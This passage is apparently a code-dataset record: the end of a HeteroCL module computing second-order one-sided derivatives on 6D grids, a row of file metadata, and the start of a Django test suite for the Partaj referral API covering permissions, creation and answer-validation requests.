        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2[0])
    with hcl.else_():
        # Interior point: all four stencil values exist on the grid.
        u_i_minus_1 = V[i, j, k, l - 1, m, n]
        u_i_plus_1 = V[i, j, k, l + 1, m, n]
        u_i_plus_2 = V[i, j, k, l + 2, m, n]
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2)
    return left_deriv[0], right_deriv[0]
def secondOrderX3_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided approximations of dV/dx along dimension 2 (index k).

    Returns ``(left_deriv, right_deriv)`` at grid point ``(i, j, k, l, m, n)``.
    Each one-sided derivative is the first divided difference corrected by the
    smaller-in-magnitude of two centered second differences (ENO-style limiting).
    Points on or next to the grid boundary substitute extrapolated ghost values
    for the missing neighbors.

    NOTE(review): the ghost-cell extrapolation formula
    ``u_ghost = u + |du| * sign(u)`` mirrors the sibling secondOrderX*_6d
    functions — confirm it against the scheme's reference implementation.
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 2
    dx = g.dx[dim_idx]  # grid spacing along this dimension, invariant below
    u_i = V[i, j, k, l, m, n]

    def _set_derivs(u_im1, u_ip1, u_ip2):
        # Shared tail: compute both one-sided derivatives from the four-point
        # stencil. Identical to the per-branch code it replaces.
        D1_i_plus_half = (u_ip1 - u_i) / dx
        D1_i_minus_half = (u_i - u_im1) / dx
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / dx)
        D1_i_plus_1_plus_half = (u_ip2 - u_ip1) / dx
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_half) / dx)
        # Use the smaller-magnitude second difference as the correction term.
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            Q2d = D2_i * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d
        with hcl.else_():
            Q2d = D2_i_plus_1 * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d

    with hcl.if_(k == 0):
        # Lower boundary: extrapolate the missing left neighbor.
        u_i_plus_1 = V[i, j, k + 1, l, m, n]
        u_i_plus_2 = V[i, j, k + 2, l, m, n]
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        _set_derivs(u_i_minus_1[0], u_i_plus_1, u_i_plus_2)
    with hcl.elif_(k == V.shape[dim_idx] - 1):
        # Upper boundary: extrapolate both missing right neighbors.
        u_i_minus_1 = V[i, j, k - 1, l, m, n]
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        _set_derivs(u_i_minus_1, u_i_plus_1[0], u_i_plus_2[0])
    with hcl.elif_(k == V.shape[dim_idx] - 2):
        # One cell inside the upper boundary: only u_{k+2} must be extrapolated.
        u_i_plus_1 = V[i, j, k + 1, l, m, n]
        u_i_minus_1 = V[i, j, k - 1, l, m, n]
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2[0])
    with hcl.else_():
        # Interior point: all four stencil values exist on the grid.
        u_i_minus_1 = V[i, j, k - 1, l, m, n]
        u_i_plus_1 = V[i, j, k + 1, l, m, n]
        u_i_plus_2 = V[i, j, k + 2, l, m, n]
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2)
    return left_deriv[0], right_deriv[0]
def secondOrderX2_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided approximations of dV/dx along dimension 1 (index j).

    Returns ``(left_deriv, right_deriv)`` at grid point ``(i, j, k, l, m, n)``.
    Each one-sided derivative is the first divided difference corrected by the
    smaller-in-magnitude of two centered second differences (ENO-style limiting).
    Points on or next to the grid boundary substitute extrapolated ghost values
    for the missing neighbors.

    NOTE(review): the ghost-cell extrapolation formula
    ``u_ghost = u + |du| * sign(u)`` mirrors the sibling secondOrderX*_6d
    functions — confirm it against the scheme's reference implementation.
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 1
    dx = g.dx[dim_idx]  # grid spacing along this dimension, invariant below
    u_i = V[i, j, k, l, m, n]

    def _set_derivs(u_im1, u_ip1, u_ip2):
        # Shared tail: compute both one-sided derivatives from the four-point
        # stencil. Identical to the per-branch code it replaces.
        D1_i_plus_half = (u_ip1 - u_i) / dx
        D1_i_minus_half = (u_i - u_im1) / dx
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / dx)
        D1_i_plus_1_plus_half = (u_ip2 - u_ip1) / dx
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_half) / dx)
        # Use the smaller-magnitude second difference as the correction term.
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            Q2d = D2_i * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d
        with hcl.else_():
            Q2d = D2_i_plus_1 * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d

    with hcl.if_(j == 0):
        # Lower boundary: extrapolate the missing left neighbor.
        u_i_plus_1 = V[i, j + 1, k, l, m, n]
        u_i_plus_2 = V[i, j + 2, k, l, m, n]
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        _set_derivs(u_i_minus_1[0], u_i_plus_1, u_i_plus_2)
    with hcl.elif_(j == V.shape[dim_idx] - 1):
        # Upper boundary: extrapolate both missing right neighbors.
        u_i_minus_1 = V[i, j - 1, k, l, m, n]
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        _set_derivs(u_i_minus_1, u_i_plus_1[0], u_i_plus_2[0])
    with hcl.elif_(j == V.shape[dim_idx] - 2):
        # One cell inside the upper boundary: only u_{j+2} must be extrapolated.
        u_i_plus_1 = V[i, j + 1, k, l, m, n]
        u_i_minus_1 = V[i, j - 1, k, l, m, n]
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2[0])
    with hcl.else_():
        # Interior point: all four stencil values exist on the grid.
        u_i_minus_1 = V[i, j - 1, k, l, m, n]
        u_i_plus_1 = V[i, j + 1, k, l, m, n]
        u_i_plus_2 = V[i, j + 2, k, l, m, n]
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2)
    return left_deriv[0], right_deriv[0]
def secondOrderX1_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided approximations of dV/dx along dimension 0 (index i).

    Returns ``(left_deriv, right_deriv)`` at grid point ``(i, j, k, l, m, n)``.
    Each one-sided derivative is the first divided difference corrected by the
    smaller-in-magnitude of two centered second differences (ENO-style limiting).
    Points on or next to the grid boundary substitute extrapolated ghost values
    for the missing neighbors.

    NOTE(review): the ghost-cell extrapolation formula
    ``u_ghost = u + |du| * sign(u)`` mirrors the sibling secondOrderX*_6d
    functions — confirm it against the scheme's reference implementation.
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 0
    dx = g.dx[dim_idx]  # grid spacing along this dimension, invariant below
    u_i = V[i, j, k, l, m, n]

    def _set_derivs(u_im1, u_ip1, u_ip2):
        # Shared tail: compute both one-sided derivatives from the four-point
        # stencil. Identical to the per-branch code it replaces.
        D1_i_plus_half = (u_ip1 - u_i) / dx
        D1_i_minus_half = (u_i - u_im1) / dx
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / dx)
        D1_i_plus_1_plus_half = (u_ip2 - u_ip1) / dx
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_half) / dx)
        # Use the smaller-magnitude second difference as the correction term.
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            Q2d = D2_i * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d
        with hcl.else_():
            Q2d = D2_i_plus_1 * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d

    with hcl.if_(i == 0):
        # Lower boundary: extrapolate the missing left neighbor.
        u_i_plus_1 = V[i + 1, j, k, l, m, n]
        u_i_plus_2 = V[i + 2, j, k, l, m, n]
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        _set_derivs(u_i_minus_1[0], u_i_plus_1, u_i_plus_2)
    with hcl.elif_(i == V.shape[dim_idx] - 1):
        # Upper boundary: extrapolate both missing right neighbors.
        u_i_minus_1 = V[i - 1, j, k, l, m, n]
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        _set_derivs(u_i_minus_1, u_i_plus_1[0], u_i_plus_2[0])
    with hcl.elif_(i == V.shape[dim_idx] - 2):
        # One cell inside the upper boundary: only u_{i+2} must be extrapolated.
        u_i_plus_1 = V[i + 1, j, k, l, m, n]
        u_i_minus_1 = V[i - 1, j, k, l, m, n]
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2[0])
    with hcl.else_():
        # Interior point: all four stencil values exist on the grid.
        u_i_minus_1 = V[i - 1, j, k, l, m, n]
        u_i_plus_1 = V[i + 1, j, k, l, m, n]
        u_i_plus_2 = V[i + 2, j, k, l, m, n]
        _set_derivs(u_i_minus_1, u_i_plus_1, u_i_plus_2)
    return left_deriv[0], right_deriv[0]
| 33.140659
| 94
| 0.575734
| 6,131
| 30,158
| 2.335834
| 0.009623
| 0.17806
| 0.143286
| 0.08505
| 0.98785
| 0.98771
| 0.98771
| 0.98771
| 0.98771
| 0.98771
| 0
| 0.076949
| 0.301479
| 30,158
| 909
| 95
| 33.177118
| 0.602867
| 0.009152
| 0
| 0.947883
| 0
| 0
| 0.012477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009772
| false
| 0
| 0.003257
| 0
| 0.022801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
424ad03205783d7207b0eea425684ccc9ed6fcab
| 174,307
|
py
|
Python
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 2
|
2020-10-15T11:28:26.000Z
|
2021-06-25T15:24:33.000Z
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 7
|
2020-10-01T14:49:51.000Z
|
2022-01-24T09:44:10.000Z
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 3
|
2020-03-18T15:53:26.000Z
|
2021-09-16T14:39:27.000Z
|
from datetime import datetime, timedelta
from io import BytesIO
from unittest import mock
import uuid
from django.conf import settings
from django.db import transaction
from django.test import TestCase
from django.utils import dateformat
from rest_framework.authtoken.models import Token
from partaj.core import factories, models
@mock.patch("partaj.core.email.Mailer.send")
class ReferralApiTestCase(TestCase):
"""
Test API routes and actions related to Referral endpoints.
"""
# LIST TESTS
def test_list_referrals_by_anonymous_user(self, _):
    """An unauthenticated LIST request on the referral endpoint gets a 401."""
    resp = self.client.get("/api/referrals/")
    self.assertEqual(resp.status_code, 401)
def test_list_referrals_by_random_logged_in_user(self, _):
    """A logged-in user with no special rights cannot LIST referrals (403)."""
    someone = factories.UserFactory()
    token = Token.objects.get_or_create(user=someone)[0]
    resp = self.client.get(
        "/api/referrals/",
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 403)
# RETRIEVE TESTS
def test_retrieve_referral_by_anonymous_user(self, _):
    """Anonymous users get a 401 when retrieving a referral by id."""
    referral = factories.ReferralFactory()
    resp = self.client.get(f"/api/referrals/{referral.id}/")
    self.assertEqual(resp.status_code, 401)
def test_retrieve_referral_by_random_logged_in_user(self, _):
    """A user unrelated to a referral cannot retrieve it (403)."""
    referral = factories.ReferralFactory()
    someone = factories.UserFactory()
    token = Token.objects.get_or_create(user=someone)[0]
    resp = self.client.get(
        f"/api/referrals/{referral.id}/",
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 403)
def test_retrieve_referral_by_linked_user(self, _):
    """The referral's author can retrieve it and the payload carries its id."""
    author = factories.UserFactory()
    referral = factories.ReferralFactory(user=author)
    token = Token.objects.get_or_create(user=author)[0]
    resp = self.client.get(
        f"/api/referrals/{referral.id}/",
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(resp.json()["id"], referral.id)
def test_retrieve_referral_by_linked_unit_member(self, _):
    """A member of the unit linked through the topic can retrieve the referral;
    the serialized urgency level and dates match the creation time."""
    member = factories.UserFactory()
    urgency = factories.ReferralUrgencyFactory(duration=timedelta(days=7))
    # Freeze "now" so created_at / due_date are deterministic.
    with mock.patch(
        "django.utils.timezone.now",
        mock.Mock(return_value=datetime(2019, 9, 3, 11, 15, 0)),
    ):
        referral = factories.ReferralFactory(urgency_level=urgency)
    referral.units.get().members.add(member)
    token = Token.objects.get_or_create(user=member)[0]
    resp = self.client.get(
        f"/api/referrals/{referral.id}/",
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 200)
    payload = resp.json()
    self.assertEqual(payload["id"], referral.id)
    # The urgency level and both dates must reflect the frozen clock.
    self.assertEqual(
        payload["urgency_level"],
        {
            "duration": "7 00:00:00",
            "id": urgency.id,
            "is_default": urgency.is_default,
            "name": urgency.name,
            "requires_justification": urgency.requires_justification,
        },
    )
    self.assertEqual(payload["created_at"], "2019-09-03T11:15:00Z")
    self.assertEqual(payload["due_date"], "2019-09-10T11:15:00Z")
# CREATE TESTS
def test_create_referral_by_anonymous_user(self, _):
    """POSTing a new referral without authentication is rejected (401)."""
    topic = factories.TopicFactory()
    payload = {
        "context": "le contexte",
        "prior_work": "le travail préalable",
        "question": "la question posée",
        "requester": "le demandeur ou la demandeuse",
        "topic": str(topic.id),
    }
    resp = self.client.post("/api/referrals/", payload)
    self.assertEqual(resp.status_code, 401)
def test_create_referral_by_random_logged_in_user(self, _):
    """Any authenticated user can create a referral; verify that every field,
    foreign key, attachment and the CREATED activity are persisted."""
    topic = factories.TopicFactory()
    urgency_level = factories.ReferralUrgencyFactory()
    author = factories.UserFactory()
    first_file = BytesIO(b"firstfile")
    first_file.name = "the first file name"
    second_file = BytesIO(b"secondfile")
    second_file.name = "the second file name"
    token = Token.objects.get_or_create(user=author)[0]
    resp = self.client.post(
        "/api/referrals/",
        {
            "context": "le contexte",
            "files": (first_file, second_file),
            "object": "l'objet de cette saisine",
            "prior_work": "le travail préalable",
            "question": "la question posée",
            "requester": "le demandeur ou la demandeuse",
            "topic": str(topic.id),
            "urgency_level": urgency_level.id,
            "urgency_explanation": "la justification de l'urgence",
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 201)
    referral = models.Referral.objects.get(id=resp.json()["id"])
    # Simple fields round-trip from the request.
    self.assertEqual(referral.context, "le contexte")
    self.assertEqual(referral.object, "l'objet de cette saisine")
    self.assertEqual(referral.prior_work, "le travail préalable")
    self.assertEqual(referral.question, "la question posée")
    self.assertEqual(referral.requester, "le demandeur ou la demandeuse")
    self.assertEqual(referral.urgency_level, urgency_level)
    self.assertEqual(referral.urgency_explanation, "la justification de l'urgence")
    # Foreign keys: topic, author, and the unit derived from the topic.
    self.assertEqual(referral.topic, topic)
    self.assertEqual(referral.user, author)
    self.assertEqual(referral.units.count(), 1)
    self.assertEqual(referral.units.first(), topic.unit)
    # Both attachments were stored and linked to the referral.
    self.assertEqual(referral.attachments.count(), 2)
    self.assertEqual(referral.attachments.all()[0].file.read(), b"firstfile")
    self.assertEqual(referral.attachments.all()[0].name, "the first file name")
    self.assertEqual(referral.attachments.all()[1].file.read(), b"secondfile")
    self.assertEqual(referral.attachments.all()[1].name, "the second file name")
    # Exactly one CREATED activity was generated for the referral.
    activities = models.ReferralActivity.objects.filter(referral__id=referral.id)
    self.assertEqual(len(activities), 1)
    self.assertEqual(activities[0].referral, referral)
    self.assertEqual(activities[0].actor, author)
    self.assertEqual(activities[0].verb, models.ReferralActivityVerb.CREATED)
def test_create_referral_by_random_logged_in_user_with_invalid_form(self, _):
    """Referral creation fails with a 400 and a field error when the required
    question field is missing from the form."""
    author = factories.UserFactory()
    topic = factories.TopicFactory()
    token = Token.objects.get_or_create(user=author)[0]
    resp = self.client.post(
        "/api/referrals/",
        {
            "context": "le contexte",
            "prior_work": "le travail préalable",
            "requester": "le demandeur ou la demandeuse",
            "topic": str(topic.id),
            "urgency": models.Referral.URGENCY_2,
            "urgency_explanation": "la justification de l'urgence",
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(
        resp.json(),
        {"question": ["Ce champ est obligatoire."]},
    )
# REQUEST ANSWER VALIDATION TESTS
def test_referral_request_answer_validation_by_anonymous_user(
    self, mock_mailer_send
):
    """Anonymous users cannot request an answer validation: 401, no side effects."""
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    validator = factories.UserFactory()
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
    )
    self.assertEqual(resp.status_code, 401)
    # No validation request, no activity, state unchanged, no email sent.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_random_logged_in_user(
    self, mock_mailer_send
):
    """A user with no link to the referral cannot request a validation (403)."""
    someone = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=someone)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 403)
    # No validation request, no activity, state unchanged, no email sent.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_user(self, mock_mailer_send):
    """Even the referral's own author cannot request an answer validation (403)."""
    author = factories.UserFactory()
    referral = factories.ReferralFactory(
        state=models.ReferralState.PROCESSING, user=author
    )
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=author)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 403)
    # No validation request, no activity, state unchanged, no email sent.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_unit_member(
    self, mock_mailer_send
):
    """A member of the linked unit can request a validation: the referral moves
    to IN_VALIDATION, an activity is recorded and the validator is emailed."""
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(resp.json()["state"], models.ReferralState.IN_VALIDATION)
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
    # The validation request was created for the expected answer and validator.
    validation_request = models.ReferralAnswerValidationRequest.objects.get(
        answer=answer,
        validator=validator,
    )
    # An activity pointing at the validation request was recorded.
    self.assertEqual(
        models.ReferralActivity.objects.get(
            verb=models.ReferralActivityVerb.VALIDATION_REQUESTED
        ).item_content_object.id,
        validation_request.id,
    )
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "case_number": referral.id,
                "created_by": member.get_full_name(),
                "link_to_referral": (
                    f"https://partaj/app/unit/{referral.units.get().id}"
                    f"/referrals-list/referral-detail/{referral.id}"
                ),
                "requester": referral.requester,
                "topic": referral.topic.name,
                "unit_name": referral.units.get().name,
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE[
                "REFERRAL_ANSWER_VALIDATION_REQUESTED_TEMPLATE_ID"
            ],
            "to": [{"email": validator.email}],
        }
    )
def test_referral_request_duplicate_answer_validation(self, mock_mailer_send):
    """Requesting a validation twice from the same validator on the same answer
    fails with an explicit 400 error and leaves everything untouched."""
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory(first_name="Alfred", last_name="Borden")
    # Pre-existing validation request for the same (answer, validator) pair.
    factories.ReferralAnswerValidationRequestFactory(
        answer=answer, validator=validator
    )
    self.assertEqual(
        models.ReferralAnswerValidationRequest.objects.all().count(), 1
    )
    token = Token.objects.get_or_create(user=member)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(
        resp.json(),
        {"errors": ["Alfred Borden was already requested to validate this answer"]},
    )
    # Still only the pre-existing request; no activity, state unchanged, no email.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_request_nonexistent_answer_validation_by_linked_unit_member(
    self, mock_mailer_send
):
    """Requesting a validation for an answer id that does not exist yields an
    explicit 400 error and no side effects."""
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    referral.units.get().members.add(member)
    random_uuid = uuid.uuid4()
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": random_uuid, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(
        resp.json()["errors"], [f"answer {random_uuid} does not exist"]
    )
    # No validation request, no activity, state unchanged, no email sent.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_unit_member_from_nonexistent_user(
    self, mock_mailer_send
):
    """Requesting a validation from a validator id that does not exist yields an
    explicit 400 error and no side effects."""
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(member)
    random_uuid = uuid.uuid4()
    token = Token.objects.get_or_create(user=member)[0]
    resp = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": random_uuid},
        HTTP_AUTHORIZATION=f"Token {token}",
    )
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(
        resp.json()["errors"], [f"user {random_uuid} does not exist"]
    )
    # No validation request, no activity, state unchanged, no email sent.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_in_validation_state(
    self, mock_mailer_send
):
    """
    New answer validations can be requested for a referral already in the
    IN_VALIDATION state.
    """
    # The requesting user must be a member of the referral's linked unit.
    user = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(user)
    validator = factories.UserFactory()
    response = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Transition succeeds; the referral stays in IN_VALIDATION.
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
    # Make sure the validation request was built with the data we expect
    validation_request = models.ReferralAnswerValidationRequest.objects.get(
        answer=answer,
        validator=validator,
    )
    # An activity was created for this validation request
    self.assertEqual(
        models.ReferralActivity.objects.get(
            verb=models.ReferralActivityVerb.VALIDATION_REQUESTED
        ).item_content_object.id,
        validation_request.id,
    )
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    # The designated validator is notified by email with this exact payload.
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "case_number": referral.id,
                "created_by": user.get_full_name(),
                "link_to_referral": (
                    f"https://partaj/app/unit/{referral.units.get().id}"
                    f"/referrals-list/referral-detail/{referral.id}"
                ),
                "requester": referral.requester,
                "topic": referral.topic.name,
                "unit_name": referral.units.get().name,
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE[
                "REFERRAL_ANSWER_VALIDATION_REQUESTED_TEMPLATE_ID"
            ],
            "to": [{"email": validator.email}],
        }
    )
def test_referral_request_answer_validation_from_received_state(
    self, mock_mailer_send
):
    """
    A referral still in the RECEIVED state rejects answer validation
    requests with an explicit transition error.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition REQUEST_ANSWER_VALIDATION not allowed from state received."
            ]
        },
    )
    # Nothing was created and the referral did not move.
